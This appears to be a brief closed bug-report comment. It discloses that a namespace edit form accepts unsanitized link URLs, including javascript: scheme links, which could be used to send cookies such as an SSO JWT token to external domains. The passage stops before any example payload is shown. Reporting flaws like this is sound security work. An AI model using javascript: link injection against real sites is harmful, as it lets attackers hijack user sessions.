ironfroggy
commented
4 years ago Note: this affects production today
Closed ironfroggy closed 4 years ago
ironfroggy
commented
4 years ago Note: this affects production today
The namespace edit form allows a number of arbitrary links. The URL field for these links is not properly sanitized in all cases. It allows
javascript:schema links, for one example. This could be used to dump all the cookies, including the RH SSH JWT token, to external domains by means like the following: